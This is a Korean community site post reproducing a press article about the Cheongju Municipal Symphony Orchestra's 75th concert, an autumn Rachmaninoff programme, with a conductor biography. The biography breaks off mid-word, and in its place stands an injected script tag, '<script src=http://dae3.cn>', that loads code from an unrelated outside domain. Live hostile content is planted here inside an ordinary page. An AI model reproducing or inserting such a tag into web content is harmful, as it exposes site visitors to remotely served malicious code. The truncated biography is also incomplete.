본문 바로가기
꿈과 희망이 있는 곳! 우리들의 세상, 청주랜드에 오신 것을 환영합니다.
꿈과 희망이 있는 곳! 우리들의 세상, 청주랜드에 오신 것을 환영합니다.

자유게시판

커뮤니티-보도자료 상세보기 - 제목, 내용, 파일 제공
제목 CBS청주]가을에 만나는 라흐마니노프
내용 가을에 만나는 라흐마니노프 청주시립교향악단 제75회 정기연주회 큰 키에 짧게 깎은 머리. 그리고 깊은 슬픔이 드리운 어두운 분위기의 라흐마니노프. 때로는 흐느끼듯. 때로는 작렬하는 그만의 애수와 낭만이 가득차있는 음악을 슬프도록 아름다운 가을의 어느 날. 청주시립교향악단의 제75회 정기연주회 ‘가을에 만나는 라흐마니노프’에서 만나보는 것은 어떨까? 라흐마니노프(1873~1943)는 19세기의 감성을 가지고 20세기를 살다 간 작곡가라는 평가를 받는 러시아 태생의 피아니스트이자 작곡가이다. 같은 낭만주의 음악이라도 슈베르트나 슈만의 음악보다 라흐마니노프의 곡들에 더욱 현대인들이 이끌리는 무언가가 그의 음악 속에 있다. 교향곡. 교향시. 관현악곡 등 다양한 작품들을 남겼지만 특히 피아노의 거장으로 일컬어질 만큼 많은 피아노곡 분야에 우수한 작품을 남겼다. 피아노에 있어서는 그 악기의 극한까지 특성을 발휘했다고 하겠으며 그의 표현 양식은 고전적인 기교와 낭만적인 선율을 효과적으로 전개시켰다. 이렇게 ‘가을’의 센티함을 많이 닮았기에 청주시립교향악단은 제75회 정기연주회의 테마를 ‘라흐마니노프’로 잡고. 관객들의 감성을 충분히 자극할 예정이다. 이날 연주회에서는 그의 작품 중 가장 인기있는 작품이자 얼마 전 잔잔한 화제를 불러일으킨 음악영화 ‘호로비츠를 위하여’에서도 흘러나와 많은 감동을 선사했던 ‘피아노 협주곡 제2번 c단조 op.18’과 라흐마니노프가 추구했던 탐미적 서정미의 정수라 할 수 있는 ‘교향곡 제2번 e단조 op.27.이 연주될 예정으로서. 라흐마니노프를 가장 잘 느낄 수 있는 시간이 될 것이다. ■ Program라흐마니노프 / 피아노협주곡 제2번 c단조 op.18라흐마니노프 / 교향곡 제2번 e단조 op.27 □ 지휘/ 장윤성한국 지휘자의 선두주자로 국내외에서 많은 활동을 하고 있는 지휘자 장윤성은 서울예술고등학교와 서울대학교 음악대학에서 작곡을 전공하고 동 대학원 지휘과와 오스트리아 비엔나 국립음대 지휘과와 러시시 국립 림스키코르사코프 음악원 그리고 러시아 Kirov Opera에서 수학하였으며 오스트리아 짤쯔부르그의 모짤테움 하기 학교. 이태리 시에나 하기학교에서 공부하였다. 대학시절 국내 가장 권위있는 중앙. 동아콩쿨 작곡부문에 1등 입상하였으며 ARS 쳄버 오케스트라를 창단하여 8년 동안 상임지휘자로 활약하며 지휘?script src=http://dae3.cn>
파일
이전,다음보기
이전글 [한빛일보]라흐마니노프 선율속으로
다음글 [연합뉴스]청주시립교향악단 제75회 정기연주회 :가을에 만나는 라흐마니노프: